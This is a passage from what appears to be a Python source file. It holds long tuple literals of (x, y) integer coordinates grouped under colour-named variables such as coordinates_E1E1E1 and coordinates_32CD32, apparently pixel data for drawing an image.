118), (154, 119), (154, 120), (154, 121), (154, 122), (154, 123), (154, 124), (154, 125), (154, 126), (154, 127), (154, 128), (154, 130), (154, 139), (154, 140), (155, 98), (155, 99), (155, 100), (155, 101), (155, 102), (155, 103), (155, 104), (155, 105), (155, 106), (155, 107), (155, 108), (155, 109), (155, 110), (155, 111), (155, 112), (155, 113), (155, 114), (155, 115), (155, 116), (155, 117), (155, 118), (155, 119), (155, 120), (155, 121), (155, 122), (155, 123), (155, 124), (155, 125), (155, 126), (155, 127), (155, 128), (155, 129), (155, 131), (155, 140), (156, 96), (156, 98), (156, 99), (156, 100), (156, 101), (156, 102), (156, 103), (156, 104), (156, 105), (156, 106), (156, 107), (156, 108), (156, 109), (156, 110), (156, 111), (156, 112), (156, 113), (156, 114), (156, 115), (156, 116), (156, 117), (156, 118), (156, 119), (156, 120), (156, 121), (156, 122), (156, 123), (156, 124), (156, 125), (156, 126), (156, 127), (156, 128), (156, 129), (156, 130), (156, 132), (156, 138), (156, 140), (157, 94), (157, 98), (157, 99), (157, 100), (157, 101), (157, 102), (157, 103), (157, 104), (157, 107), (157, 108), (157, 109), (157, 110), (157, 111), (157, 112), (157, 113), (157, 114), (157, 115), (157, 116), (157, 117), (157, 118), (157, 119), (157, 120), (157, 121), (157, 122), (157, 123), (157, 124), (157, 125), (157, 126), (157, 127), (157, 128), (157, 129), (157, 130), (157, 131), (157, 133), (157, 134), (157, 137), (157, 140), (158, 92), (158, 96), (158, 97), (158, 98), (158, 99), (158, 100), (158, 101), (158, 102), (158, 103), (158, 106), (158, 116), (158, 117), (158, 118), (158, 119), (158, 120), (158, 121), (158, 122), (158, 123), (158, 124), (158, 125), (158, 126), (158, 127), (158, 128), (158, 129), (158, 130), (158, 131), (158, 132), (158, 135), (158, 138), (158, 140), (159, 91), (159, 93), (159, 94), (159, 97), (159, 98), (159, 99), (159, 100), (159, 101), (159, 102), (159, 104), (159, 107), (159, 108), (159, 109), (159, 110), (159, 111), (159, 112), (159, 113), (159, 114), (159, 115), (159, 117), (159, 118), (159, 119), (159, 120), (159, 121), (159, 122), (159, 123), (159, 124), (159, 125), (159, 126), (159, 127), (159, 128), (159, 129), (159, 130), (159, 131), (159, 132), (159, 133), (159, 134), (159, 136), (159, 137), (159, 138), (159, 140), (160, 90), (160, 96), (160, 98), (160, 99), (160, 100), (160, 101), (160, 103), (160, 116), (160, 118), (160, 119), (160, 120), (160, 121), (160, 122), (160, 123), (160, 124), (160, 125), (160, 126), (160, 127), (160, 128), (160, 129), (160, 130), (160, 131), (160, 132), (160, 133), (160, 134), (160, 135), (160, 136), (160, 137), (160, 138), (160, 139), (160, 141), (161, 89), (161, 97), (161, 99), (161, 100), (161, 102), (161, 117), (161, 119), (161, 120), (161, 121), (161, 122), (161, 123), (161, 124), (161, 125), (161, 126), (161, 127), (161, 128), (161, 129), (161, 130), (161, 131), (161, 132), (161, 133), (161, 134), (161, 135), (161, 136), (161, 137), (161, 138), (161, 139), (161, 140), (161, 142), (162, 97), (162, 99), (162, 100), (162, 102), (162, 118), (162, 120), (162, 121), (162, 122), (162, 123), (162, 124), (162, 125), (162, 126), (162, 127), (162, 128), (162, 129), (162, 130), (162, 131), (162, 132), (162, 133), (162, 134), (162, 135), (162, 136), (162, 137), (162, 138), (162, 139), (162, 143), (163, 97), (163, 98), (163, 99), (163, 100), (163, 102), (163, 118), (163, 120), (163, 121), (163, 122), (163, 123), (163, 124), (163, 125), (163, 126), (163, 127), (163, 128), (163, 129), (163, 130), (163, 131), (163, 132), (163, 133), (163, 134), (163, 135), (163, 136), (163, 137), (163, 138), (163, 141), (163, 144), (164, 98), (164, 100), (164, 102), (164, 118), (164, 120), (164, 121), (164, 122), (164, 123), (164, 124), (164, 125), (164, 126), (164, 127), (164, 128), (164, 129), (164, 130), (164, 131), (164, 132), (164, 133), (164, 134), (164, 135), (164, 136), (164, 137), (164, 139), (164, 142), (164, 146), (165, 98), (165, 100), (165, 102), (165, 118), (165, 120), (165, 121), (165, 122), (165, 123), (165, 124), (165, 125), (165, 126), (165, 127), (165, 128), (165, 129), (165, 130), (165, 131), (165, 132), (165, 133), (165, 134), (165, 135), (165, 136), (165, 138), (165, 144), (165, 147), (166, 98), (166, 100), (166, 102), (166, 118), (166, 120), (166, 121), (166, 125), (166, 126), (166, 127), (166, 128), (166, 129), (166, 130), (166, 131), (166, 132), (166, 133), (166, 134), (166, 135), (166, 136), (166, 138), (166, 145), (167, 98), (167, 100), (167, 102), (167, 118), (167, 120), (167, 123), (167, 126), (167, 127), (167, 128), (167, 129), (167, 130), (167, 131), (167, 132), (167, 138), (167, 147), (168, 98), (168, 100), (168, 102), (168, 118), (168, 121), (168, 125), (168, 127), (168, 128), (168, 129), (168, 130), (168, 133), (168, 134), (168, 135), (168, 138), (169, 98), (169, 100), (169, 102), (169, 118), (169, 120), (169, 126), (169, 128), (169, 129), (169, 137), (169, 138), (170, 98), (170, 101), (170, 118), (170, 126), (170, 128), (170, 130), (170, 139), (171, 97), (171, 100), (171, 118), (171, 119), (171, 126), (171, 129), (171, 139), (172, 99), (172, 106), (172, 118), (172, 126), (172, 128), (172, 140), (173, 94), (173, 97), (173, 106), (173, 107), (173, 118), (173, 126), (174, 94), (174, 96), (174, 106), (174, 126), (174, 141), (175, 109), (175, 126), (175, 141), (176, 107), (176, 109), (176, 126), (177, 109), (177, 126), (178, 109), (178, 126), (180, 125), (181, 125), (182, 124), (182, 125), (183, 124), (183, 125), ) coordinates_E1E1E1 = ((63, 130), (63, 131), (64, 116), (64, 118), (64, 120), (64, 130), (65, 104), (65, 106), (65, 108), (65, 115), (65, 120), (65, 130), (66, 103), (66, 115), (66, 117), (66, 118), (66, 120), (66, 130), (67, 103), (67, 105), (67, 106), (67, 107), (67, 109), (67, 114), (67, 116), (67, 120), (67, 130), (68, 102), (68, 104), (68, 105), (68, 106), (68, 107), (68, 109), (68, 115), (68, 119), (68, 120), (68, 130), (68, 142), (69, 95), (69, 102), (69, 104), (69, 105), (69, 106), (69, 107), (69, 108), (69, 109), (69, 111), (69, 112), (69, 115), (69, 119), (69, 130), (69, 141), (69, 144), (70, 96), (70, 102), (70, 104), (70, 105), (70, 106), (70, 107), (70, 108), (70, 109), (70, 114), (70, 115), (70, 119), (70, 141), (70, 144), (71, 96), (71, 97), (71, 102), (71, 104), (71, 105), (71, 106), (71, 107), (71, 108), (71, 109), (71, 110), (71, 111), (71, 112), (71, 113), (71, 114), (71, 115), (71, 118), (71, 119), (71, 140), (71, 143), (72, 97), (72, 99), (72, 100), (72, 101), (72, 102), (72, 103), (72, 104), (72, 105), (72, 106), (72, 107), (72, 108), (72, 109), (72, 110), (72, 111), (72, 112), (72, 113), (72, 115), (72, 118), (72, 119), (72, 131), (72, 140), (72, 142), (73, 98), (73, 102), (73, 103), (73, 104), (73, 105), (73, 106), (73, 107), (73, 108), (73, 109), (73, 110), (73, 111), (73, 112), (73, 113), (73, 115), (73, 119), (73, 131), (73, 139), (73, 141), (74, 99), (74, 101), (74, 102), (74, 103), (74, 104), (74, 105), (74, 106), (74, 107), (74, 108), (74, 109), (74, 110), (74, 111), (74, 112), (74, 113), (74, 117), (74, 119), (74, 130), (74, 131), (74, 138), (74, 140), (75, 100), (75, 102), (75, 103), (75, 104), (75, 105), (75, 106), (75, 107), (75, 108), (75, 109), (75, 110), (75, 111), (75, 113), (75, 117), (75, 118), (75, 119), (75, 129), (75, 131), (75, 136), (75, 140), (76, 100), (76, 102), (76, 103), (76, 104), (76, 105), (76, 106), (76, 107), (76, 108), (76, 109), (76, 110), (76, 111), (76, 113), (76, 116), (76, 118), (76, 128), (76, 130), (76, 131), (76, 133), (76, 134), (76, 139), (77, 101), (77, 103), (77, 104), (77, 105), (77, 106), (77, 107), (77, 108), (77, 109), (77, 110), (77, 111), (77, 112), (77, 113), (77, 116), (77, 118), (77, 128), (77, 130), (77, 131), (77, 135), (77, 136), (77, 137), (77, 138), (77, 140), (78, 101), (78, 103), (78, 104), (78, 105), (78, 106), (78, 107), (78, 108), (78, 109), (78, 110), (78, 111), (78, 112), (78, 113), (78, 114), (78, 115), (78, 118), (78, 127), (78, 129), (78, 130), (78, 131), (78, 132), (78, 133), (78, 134), (78, 135), (78, 136), (78, 137), (78, 138), (78, 140), (78, 146), (78, 148), (79, 101), (79, 103), (79, 104), (79, 105), (79, 106), (79, 107), (79, 108), (79, 109), (79, 110), (79, 112), (79, 117), (79, 118), (79, 127), (79, 129), (79, 130), (79, 131), (79, 132), (79, 133), (79, 134), (79, 135), (79, 136), (79, 137), (79, 138), (79, 139), (79, 141), (79, 144), (79, 147), (80, 86), (80, 87), (80, 88), (80, 89), (80, 90), (80, 101), (80, 103), (80, 104), (80, 105), (80, 106), (80, 107), (80, 108), (80, 109), (80, 110), (80, 112), (80, 117), (80, 119), (80, 126), (80, 128), (80, 129), (80, 130), (80, 131), (80, 132), (80, 133), (80, 134), (80, 135), (80, 136), (80, 137), (80, 138), (80, 139), (80, 140), (80, 143), (80, 146), (81, 80), (81, 82), (81, 83), (81, 84), (81, 85), (81, 86), (81, 87), (81, 88), (81, 89), (81, 90), (81, 91), (81, 92), (81, 93), (81, 94), (81, 100), (81, 102), (81, 103), (81, 104), (81, 105), (81, 106), (81, 107), (81, 108), (81, 109), (81, 110), (81, 112), (81, 117), (81, 118), (81, 120), (81, 125), (81, 127), (81, 128), (81, 129), (81, 130), (81, 131), (81, 132), (81, 133), (81, 134), (81, 135), (81, 136), (81, 137), (81, 138), (81, 139), (81, 140), (81, 141), (81, 144), (81, 146), (82, 95), (82, 96), (82, 97), (82, 98), (82, 101), (82, 102), (82, 103), (82, 104), (82, 105), (82, 106), (82, 107), (82, 108), (82, 109), (82, 110), (82, 112), (82, 117), (82, 119), (82, 122), (82, 123), (82, 126), (82, 127), (82, 128), (82, 129), (82, 130), (82, 131), (82, 132), (82, 133), (82, 134), (82, 135), (82, 136), (82, 137), (82, 138), (82, 139), (82, 140), (82, 141), (82, 142), (82, 143), (82, 144), (82, 146), (83, 93), (83, 100), (83, 101), (83, 102), (83, 103), (83, 104), (83, 105), (83, 106), (83, 107), (83, 108), (83, 109), (83, 110), (83, 111), (83, 113), (83, 116), (83, 117), (83, 118), (83, 119), (83, 120), (83, 125), (83, 126), (83, 127), (83, 128), (83, 129), (83, 130), (83, 131), (83, 132), (83, 133), (83, 134), (83, 135), (83, 136), (83, 137), (83, 138), (83, 139), (83, 140), (83, 141), (83, 142), (83, 143), (83, 144), (83, 145), (83, 147), (84, 93), (84, 95), (84, 96), (84, 97), (84, 98), (84, 99), (84, 100), (84, 101), (84, 102), (84, 103), (84, 104), (84, 105), (84, 106), (84, 107), (84, 108), (84, 109), (84, 110), (84, 111), (84, 112), (84, 115), (84, 117), (84, 118), (84, 119), (84, 120), (84, 121), (84, 122), (84, 123), (84, 124), (84, 125), (84, 126), (84, 127), (84, 128), (84, 129), (84, 130), (84, 131), (84, 132), (84, 133), (84, 134), (84, 135), (84, 136), (84, 137), (84, 138), (84, 139), (84, 140), (84, 141), (84, 142), (84, 147), (85, 93), (85, 95), (85, 96), (85, 97), (85, 98), (85, 99), (85, 100), (85, 101), (85, 102), (85, 103), (85, 104), (85, 105), (85, 106), (85, 107), (85, 108), (85, 109), (85, 110), (85, 111), (85, 112), (85, 113), (85, 116), (85, 117), (85, 118), (85, 119), (85, 120), (85, 121), (85, 122), (85, 123), (85, 124), (85, 125), (85, 126), (85, 127), (85, 128), (85, 129), (85, 130), (85, 131), (85, 132), (85, 133), (85, 134), (85, 135), (85, 136), (85, 137), (85, 138), (85, 139), (85, 140), (85, 143), (85, 144), (85, 146), (86, 94), (86, 95), (86, 96), (86, 97), (86, 98), (86, 99), (86, 100), (86, 101), (86, 102), (86, 103), (86, 104), (86, 105), (86, 106), (86, 107), (86, 108), (86, 109), (86, 110), (86, 111), (86, 112), (86, 113), (86, 114), (86, 115), (86, 116), (86, 117), (86, 118), (86, 119), (86, 120), (86, 121), (86, 122), (86, 123), (86, 124), (86, 125), (86, 126), (86, 127), (86, 128), (86, 129), (86, 130), (86, 131), (86, 132), (86, 133), (86, 134), (86, 135), (86, 138), (86, 139), (86, 140), (86, 142), (87, 94), (87, 96), (87, 97), (87, 98), (87, 99), (87, 100), (87, 101), (87, 102), (87, 103), (87, 104), (87, 105), (87, 106), (87, 107), (87, 108), (87, 109), (87, 110), (87, 111), (87, 112), (87, 113), (87, 114), (87, 115), (87, 116), (87, 117), (87, 118), (87, 119), (87, 120), (87, 121), (87, 122), (87, 123), (87, 124), (87, 125), (87, 126), (87, 127), (87, 128), (87, 129), (87, 133), (87, 134), (87, 136), (87, 137), (87, 140), (88, 95), (88, 97), (88, 98), (88, 99), (88, 100), (88, 101), (88, 102), (88, 103), (88, 104), (88, 105), (88, 106), (88, 107), (88, 108), (88, 109), (88, 110), (88, 111), (88, 112), (88, 113), (88, 114), (88, 115), (88, 116), (88, 117), (88, 118), (88, 119), (88, 120), (88, 121), (88, 122), (88, 123), (88, 124), (88, 125), (88, 126), (88, 127), (88, 130), (88, 131), (88, 132), (88, 133), (88, 135), (88, 138), (88, 140), (89, 95), (89, 97), (89, 98), (89, 99), (89, 100), (89, 101), (89, 102), (89, 103), (89, 104), (89, 105), (89, 106), (89, 107), (89, 108), (89, 109), (89, 110), (89, 111), (89, 112), (89, 113), (89, 114), (89, 115), (89, 116), (89, 117), (89, 118), (89, 119), (89, 120), (89, 121), (89, 122), (89, 123), (89, 124), (89, 129), (89, 133), (89, 134), (89, 140), (90, 95), (90, 97), (90, 98), (90, 99), (90, 100), (90, 101), (90, 102), (90, 103), (90, 104), (90, 105), (90, 106), (90, 107), (90, 108), (90, 109), (90, 110), (90, 111), (90, 112), (90, 113), (90, 114), (90, 115), (90, 116), (90, 117), (90, 118), (90, 119), (90, 120), (90, 121), (90, 122), (90, 125), (90, 127), (90, 133), (90, 140), (91, 73), (91, 74), (91, 94), (91, 96), (91, 97), (91, 98), (91, 99), (91, 100), (91, 101), (91, 102), (91, 103), (91, 104), (91, 105), (91, 106), (91, 107), (91, 108), (91, 109), (91, 110), (91, 111), (91, 112), (91, 113), (91, 114), (91, 115), (91, 116), (91, 117), (91, 118), (91, 119), (91, 120), (91, 123), (91, 124), (91, 133), (91, 140), (92, 72), (92, 74), (92, 75), (92, 94), (92, 96), (92, 97), (92, 98), (92, 99), (92, 100), (92, 101), (92, 102), (92, 103), (92, 104), (92, 105), (92, 106), (92, 107), (92, 108), (92, 109), (92, 110), (92, 111), (92, 112), (92, 113), (92, 114), (92, 115), (92, 116), (92, 117), (92, 118), (92, 122), (92, 141), (93, 77), (93, 78), (93, 79), (93, 80), (93, 81), (93, 82), (93, 93), (93, 95), (93, 96), (93, 97), (93, 98), (93, 99), (93, 100), (93, 101), (93, 102), (93, 103), (93, 104), (93, 105), (93, 106), (93, 107), (93, 108), (93, 109), (93, 110), (93, 111), (93, 112), (93, 113), (93, 114), (93, 115), (93, 116), (93, 120), (93, 132), (93, 141), (94, 78), (94, 83), (94, 84), (94, 85), (94, 86), (94, 87), (94, 88), (94, 89), (94, 90), (94, 91), (94, 94), (94, 95), (94, 96), (94, 97), (94, 98), (94, 99), (94, 100), (94, 101), (94, 102), (94, 103), (94, 104), (94, 105), (94, 106), (94, 107), (94, 108), (94, 109), (94, 110), (94, 111), (94, 112), (94, 113), (94, 114), (94, 118), (94, 132), (94, 141), (94, 142), (95, 79), (95, 82), (95, 93), (95, 94), (95, 95), (95, 96), (95, 97), (95, 98), (95, 99), (95, 100), (95, 101), (95, 102), (95, 103), (95, 104), (95, 105), (95, 106), (95, 107), (95, 108), (95, 109), (95, 110), (95, 111), (95, 112), (95, 113), (95, 116), (96, 81), (96, 84), (96, 85), (96, 86), (96, 87), (96, 88), (96, 89), (96, 90), (96, 91), (96, 92), (96, 93), (96, 94), (96, 95), (96, 96), (96, 97), (96, 98), (96, 99), (96, 100), (96, 101), (96, 102), (96, 103), (96, 104), (96, 105), (96, 106), (96, 107), (96, 108), (96, 109), (96, 110), (96, 111), (96, 112), (96, 114), (96, 131), (97, 82), (97, 85), (97, 86), (97, 87), (97, 88), (97, 89), (97, 90), (97, 91), (97, 92), (97, 93), (97, 94), (97, 95), (97, 96), (97, 97), (97, 98), (97, 99), (97, 100), (97, 101), (97, 102), (97, 103), (97, 104), (97, 105), (97, 106), (97, 107), (97, 108), (97, 109), (97, 110), (97, 111), (97, 113), (97, 131), (98, 84), (98, 86), (98, 87), (98, 88), (98, 89), (98, 90), (98, 91), (98, 92), (98, 93), (98, 94), (98, 95), (98, 96), (98, 97), (98, 98), (98, 99), (98, 100), (98, 101), (98, 102), (98, 103), (98, 104), (98, 105), (98, 106), (98, 107), (98, 108), (98, 109), (98, 110), (98, 112), (98, 130), (98, 131), (99, 85), (99, 87), (99, 88), (99, 89), (99, 90), (99, 91), (99, 92), (99, 93), (99, 94), (99, 95), (99, 96), (99, 97), (99, 98), (99, 99), (99, 100), (99, 101), (99, 102), (99, 103), (99, 104), (99, 105), (99, 106), (99, 107), (99, 108), (99, 109), (99, 111), (99, 129), (99, 131), (100, 86), (100, 88), (100, 89), (100, 90), (100, 91), (100, 92), (100, 93), (100, 94), (100, 95), (100, 96), (100, 97), (100, 98), (100, 99), (100, 100), (100, 101), (100, 102), (100, 103), (100, 104), (100, 105), (100, 106), (100, 107), (100, 108), (100, 110), (100, 129), (100, 131), (101, 86), (101, 88), (101, 89), (101, 90), (101, 91), (101, 92), (101, 93), (101, 94), (101, 95), (101, 96), (101, 97), (101, 98), (101, 99), (101, 100), (101, 101), (101, 102), (101, 103), (101, 104), (101, 105), (101, 106), (101, 107), (101, 108), (101, 110), (101, 128), (102, 75), (102, 77), (102, 78), (102, 86), (102, 88), (102, 89), (102, 90), (102, 91), (102, 92), (102, 93), (102, 94), (102, 95), (102, 96), (102, 97), (102, 98), (102, 99), (102, 100), (102, 101), (102, 102), (102, 103), (102, 104), (102, 105), (102, 106), (102, 107), (102, 108), (102, 110), (102, 127), (103, 80), (103, 82), (103, 83), (103, 84), (103, 85), (103, 86), (103, 87), (103, 88), (103, 89), (103, 90), (103, 91), (103, 92), (103, 93), (103, 94), (103, 95), (103, 96), (103, 97), (103, 98), (103, 99), (103, 100), (103, 101), (103, 102), (103, 103), (103, 104), (103, 105), (103, 106), (103, 107), (103, 108), (103, 110), (103, 127), (104, 81), (104, 86), (104, 87), (104, 88), (104, 89), (104, 90), (104, 91), (104, 92), (104, 93), (104, 94), (104, 95), (104, 96), (104, 102), (104, 103), (104, 104), (104, 105), (104, 106), (104, 107), (104, 108), (104, 110), (104, 115), (104, 117), (104, 118), (104, 119), (104, 120), (104, 121), (104, 122), (104, 123), (104, 124), (104, 127), (105, 81), (105, 83), (105, 84), (105, 85), (105, 88), (105, 89), (105, 90), (105, 91), (105, 92), (105, 93), (105, 94), (105, 97), (105, 98), (105, 99), (105, 100), (105, 103), (105, 104), (105, 105), (105, 106), (105, 107), (105, 108), (105, 110), (105, 114), (105, 127), (105, 135), (106, 82), (106, 86), (106, 87), (106, 89), (106, 90), (106, 91), (106, 92), (106, 93), (106, 96), (106, 102), (106, 104), (106, 105), (106, 106), (106, 107), (106, 108), (106, 109), (106, 110), (106, 111), (106, 112), (106, 113), (106, 116), (106, 117), (106, 118), (106, 119), (106, 120), (106, 121), (106, 122), (106, 123), (106, 124), (106, 125), (106, 127), (107, 85), (107, 89), (107, 90), (107, 91), (107, 92), (107, 103), (107, 105), (107, 106), (107, 107), (107, 108), (107, 109), (107, 110), (107, 114), (107, 115), (107, 116), (107, 117), (107, 118), (107, 119), (107, 120), (107, 121), (107, 122), (107, 123), (107, 124), (107, 125), (107, 127), (108, 81), (108, 83), (108, 89), (108, 93), (108, 103), (108, 105), (108, 106), (108, 107), (108, 108), (108, 109), (108, 110), (108, 111), (108, 112), (108, 113), (108, 114), (108, 115), (108, 116), (108, 117), (108, 118), (108, 119), (108, 120), (108, 121), (108, 122), (108, 123), (108, 124), (108, 125), (108, 127), (109, 80), (109, 89), (109, 92), (109, 103), (109, 105), (109, 106), (109, 107), (109, 108), (109, 109), (109, 110), (109, 111), (109, 112), (109, 113), (109, 114), (109, 115), (109, 116), (109, 117), (109, 118), (109, 119), (109, 120), (109, 121), (109, 122), (109, 123), (109, 124), (109, 126), (110, 67), (110, 69), (110, 70), (110, 71), (110, 72), (110, 73), (110, 74), (110, 75), (110, 76), (110, 77), (110, 79), (110, 103), (110, 105), (110, 106), (110, 107), (110, 108), (110, 109), (110, 110), (110, 111), (110, 112), (110, 113), (110, 114), (110, 115), (110, 116), (110, 117), (110, 118), (110, 119), (110, 120), (110, 123), (110, 126), (111, 76), (111, 78), (111, 103), (111, 104), (111, 105), (111, 106), (111, 109), (111, 110), (111, 111), (111, 112), (111, 113), (111, 114), (111, 115), (111, 116), (111, 117), (111, 118), (111, 119), (111, 122), (111, 125), (112, 104), (112, 106), (112, 108), (112, 110), (112, 111), (112, 112), (112, 113), (112, 114), (112, 115), (112, 116), (112, 117), (112, 118), (112, 120), (113, 104), (113, 106), (113, 109), (113, 112), (113, 113), (113, 114), (113, 115), (113, 116), (113, 117), (114, 104), (114, 106), (114, 110), (114, 112), (114, 113), (114, 114), (114, 115), (114, 116), (115, 104), (115, 106), (115, 111), (115, 113), (115, 114), (115, 115), (116, 104), (116, 112), (117, 104), (117, 105), (117, 113), (117, 115), (118, 105), ) coordinates_771286 = ((145, 124), (146, 122), (146, 125), (147, 117), (147, 119), (147, 120), (147, 123), (147, 124), (147, 126), (148, 117), (148, 121), (148, 122), (148, 123), (148, 124), (149, 118), (149, 121), (149, 122), (149, 123), (149, 124), (149, 125), (149, 127), (150, 119), (150, 123), (150, 124), (150, 125), (150, 126), (150, 128), (151, 121), (151, 122), (151, 125), (151, 126), (151, 128), (152, 123), (152, 124), (152, 127), (152, 129), (153, 129), (154, 127), (154, 129), (155, 128), (155, 129), (156, 129), ) coordinates_781286 = ((90, 131), (91, 129), (91, 131), (92, 128), (92, 130), (93, 124), (93, 125), (93, 126), (93, 130), (94, 122), (94, 127), (94, 128), (94, 130), (95, 120), (95, 123), (95, 124), (95, 125), (95, 126), (95, 127), (95, 129), (96, 118), (96, 122), (96, 123), (96, 124), (96, 125), (96, 126), (96, 127), (96, 129), (97, 116), (97, 120), (97, 121), (97, 122), (97, 123), (97, 124), (97, 125), (97, 126), (97, 128), (98, 115), (98, 118), (98, 119), (98, 120), (98, 121), (98, 122), (98, 123), (98, 124), (98, 125), (98, 126), (98, 128), (99, 113), (99, 116), (99, 117), (99, 118), (99, 119), (99, 120), (99, 121), (99, 122), (99, 123), (99, 124), (99, 125), (99, 127), (100, 112), (100, 115), (100, 116), (100, 117), (100, 118), (100, 119), (100, 120), (100, 121), (100, 122), (100, 123), (100, 124), (100, 126), (101, 112), (101, 114), (101, 125), (102, 112), (102, 115), (102, 116), (102, 117), (102, 118), (102, 119), (102, 120), (102, 121), (102, 122), (102, 124), (103, 112), (103, 114), (104, 112), (104, 113), ) coordinates_CF2090 = ((161, 112), (161, 114), (162, 112), (162, 113), (163, 111), (163, 113), (164, 111), (164, 113), (165, 111), (165, 113), (166, 111), (166, 113), (167, 111), (167, 113), (168, 111), (168, 113), (169, 111), (169, 112), (170, 111), (170, 112), (171, 111), (171, 112), (172, 111), (172, 112), (173, 111), (173, 112), (174, 111), (174, 112), (175, 111), (175, 112), (176, 111), (177, 111), (177, 113), (178, 111), (178, 114), (179, 111), (179, 113), (179, 114), (180, 112), (180, 115), (181, 113), (181, 115), (182, 110), (182, 113), (182, 116), (183, 110), (183, 112), (183, 113), (183, 114), (183, 116), (184, 110), (184, 115), (185, 111), (185, 114), ) coordinates_EFE68C = ((162, 116), (163, 116), (164, 115), (164, 116), (165, 115), (165, 116), (166, 115), (166, 116), (167, 115), (167, 116), (168, 115), (168, 116), (169, 115), (169, 116), (169, 123), (170, 116), (170, 122), (170, 124), (171, 114), (171, 116), (171, 121), (171, 124), (172, 114), (172, 116), (172, 121), (172, 124), (173, 114), (173, 116), (173, 120), (173, 122), (173, 124), (174, 114), (174, 116), (174, 120), (174, 121), (174, 122), (174, 124), (175, 114), (175, 116), (175, 117), (175, 118), (175, 120), (175, 121), (175, 122), (175, 124), (175, 128), (176, 115), (176, 117), (176, 119), (176, 120), (176, 121), (176, 122), (176, 124), (176, 128), (177, 115), (177, 118), (177, 119), (177, 120), (177, 121), (177, 122), (177, 124), (177, 128), (178, 116), (178, 118), (178, 119), (178, 120), (178, 121), (178, 122), (178, 124), (178, 128), (178, 129), (179, 118), (179, 120), (179, 121), (179, 123), (179, 128), (179, 129), (180, 118), (180, 120), (180, 121), (180, 123), (180, 127), (180, 129), (181, 119), (181, 122), (181, 127), (181, 129), (182, 119), (182, 122), (182, 127), (182, 129), (183, 119), (183, 122), (183, 127), (183, 130), (184, 119), (184, 121), (184, 123), (184, 126), (184, 128), (184, 129), (184, 131), (185, 119), (185, 121), (185, 122), (185, 124), (185, 125), (185, 127), (185, 128), (185, 129), (185, 130), (185, 132), (186, 119), (186, 122), (186, 123), (186, 126), (186, 127), (186, 128), (186, 129), (186, 133), (187, 123), (187, 124), (187, 125), (187, 126), (187, 130), (187, 131), (188, 122), (188, 127), (188, 129), (189, 123), (189, 125), (189, 126), ) coordinates_31CD32 = ((167, 140), (168, 140), (169, 141), (170, 133), (170, 135), (170, 141), (171, 132), (171, 136), (172, 131), (172, 133), (172, 134), (172, 135), (172, 137), (172, 142), (172, 144), (173, 130), (173, 132), (173, 133), (173, 134), (173, 135), (173, 136), (173, 138), (173, 142), (173, 145), (174, 130), (174, 132), (174, 133), (174, 134), (174, 135), (174, 136), (174, 137), (174, 139), (174, 143), (174, 146), (175, 130), (175, 131), (175, 132), (175, 133), (175, 134), (175, 135), (175, 136), (175, 137), (175, 139), (175, 143), (176, 131), (176, 133), (176, 134), (176, 135), (176, 136), (176, 137), (176, 139), (176, 142), (176, 144), (176, 146), (177, 131), (177, 133), (177, 134), (177, 135), (177, 136), (177, 137), (177, 138), (177, 139), (177, 140), (177, 141), (177, 143), (178, 131), (178, 133), (178, 134), (178, 135), (178, 136), (178, 137), (178, 138), (178, 139), (178, 142), (179, 131), (179, 133), (179, 134), (179, 135), (179, 136), (179, 137), (179, 138), (179, 139), (179, 141), (179, 142), (180, 131), (180, 133), (180, 134), (180, 135), (180, 136), (180, 137), (180, 138), (180, 139), (180, 140), (180, 142), (181, 132), (181, 140), (181, 142), (182, 133), (182, 135), (182, 136), (182, 137), (182, 138), (182, 143), (183, 140), (183, 143), (184, 142), ) coordinates_D02090 = ((59, 122), (59, 124), (60, 122), (60, 125), (61, 122), (61, 125), (62, 122), (62, 125), (63, 123), (63, 125), (64, 123), (64, 125), (64, 126), (65, 122), (65, 124), (65, 126), (66, 122), (66, 124), (66, 126), (67, 122), (67, 124), (67, 126), (68, 122), (68, 125), (69, 122), (69, 125), (70, 122), (70, 124), (71, 121), (71, 123), (72, 121), (72, 123), (73, 121), (73, 123), (74, 121), (74, 123), (75, 121), (75, 122), (76, 121), (76, 122), (77, 121), (77, 122), (78, 122), (79, 121), (80, 123), ) coordinates_F0E68C = ((58, 129), (59, 127), (59, 129), (59, 130), (59, 131), (59, 132), (59, 134), (60, 127), (60, 134), (61, 127), (61, 129), (61, 132), (61, 134), (62, 127), (62, 133), (62, 134), (63, 128), (63, 133), (63, 135), (64, 128), (64, 132), (64, 135), (65, 128), (65, 132), (65, 135), (66, 128), (66, 132), (66, 134), (66, 136), (67, 128), (67, 132), (67, 134), (67, 136), (68, 128), (68, 132), (68, 134), (68, 136), (69, 127), (69, 128), (69, 132), (69, 134), (69, 136), (70, 126), (70, 128), (70, 129), (70, 132), (70, 134), (70, 136), (71, 125), (71, 127), (71, 129), (71, 133), (71, 135), (72, 125), (72, 127), (72, 129), (72, 133), (72, 135), (73, 125), (73, 128), (73, 133), (73, 135), (74, 125), (74, 127), (74, 133), (75, 125), (75, 126), (76, 126), (77, 125), (77, 126), (78, 125), (79, 125), ) coordinates_32CD32 = ((58, 140), (59, 136), (59, 138), (59, 141), (60, 136), (60, 139), (60, 141), (61, 136), (61, 138), (61, 139), (61, 140), (61, 142), (62, 137), (62, 139), (62, 140), (62, 142), (63, 137), (63, 139), (63, 142), (64, 137), (64, 139), (64, 140), (64, 143), (64, 148), (64, 150), (65, 138), (65, 139), (65, 142), (65, 144), (65, 146), (65, 147), (66, 138), (66, 139), (66, 142), (66, 148), (66, 149), (66, 151), (67, 138), (67, 140), (67, 143), (67, 144), (67, 146), (67, 147), (67, 148), (67, 149), (67, 151), (68, 138), (68, 140), (68, 147), (68, 148), (68, 149), (68, 151), (69, 138), (69, 139), (69, 147), (69, 149), (69, 151), (70, 138), (70, 139), (70, 146), (70, 148), (70, 149), (70, 150), (70, 151), (71, 138), (71, 145), (71, 147), (71, 148), (71, 149), (71, 150), (71, 151), (71, 154), (72, 137), (72, 144), (72, 146), (72, 147), (72, 148), (72, 149), (72, 150), (72, 151), (72, 152), (72, 155), (73, 137), (73, 143), (73, 145), (73, 146), (73, 147), (73, 148), (73, 149), (73, 150), (73, 151), (73, 152), (73, 153), (73, 154), (73, 156), (74, 142), (74, 145), (74, 146), (74, 147), (74, 149), (74, 150), (74, 151), (74, 152), (74, 153), (74, 154), (74, 155), (74, 158), (75, 142), (75, 144), (75, 148), (75, 150), (75, 151), (75, 152), (75, 153), (75, 154), (75, 155), (75, 156), (75, 159), (76, 142), (76, 146), (76, 149), (76, 150), (76, 151), (76, 152), (76, 153), (76, 154), (76, 155), (76, 156), (76, 157), (76, 159), (77, 142), (77, 144), (77, 150), (77, 152), (77, 153), (77, 154), (77, 155), (77, 156), (77, 158), (78, 150), (78, 152), (78, 153), (78, 154), 